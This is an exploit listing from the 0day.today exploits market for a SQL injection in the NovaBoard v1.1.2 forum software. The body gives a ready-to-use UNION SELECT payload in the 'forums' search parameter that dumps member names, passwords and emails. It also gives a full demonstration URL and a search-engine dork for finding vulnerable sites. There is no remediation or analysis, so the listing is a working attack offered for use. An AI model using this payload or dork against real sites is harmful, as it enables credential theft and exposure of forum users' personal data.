[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NovaBoard v1.1.2 SQL Injection Vulnerability

Author
Delibey
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10730
Category
web applications
Date add
28-01-2010
Platform
unsorted
============================================
NovaBoard v1.1.2 SQL Injection Vulnerability
============================================

#############################################################
# NovaBoard v1.1.2 SQL Injection Vulnerability
   
# Plugin Home: http://www.novaboard.net/
   
# Author: Delibey 
##############################################################
   
   
# Download   Script  : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip
                                     
   
    
# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj]
   
   
#  1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
              
#  Dork  : "Powered by NovaBoard v1.1.2"          
   
# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
   
    
############################################################## 



#  0day.today [2024-12-27]  #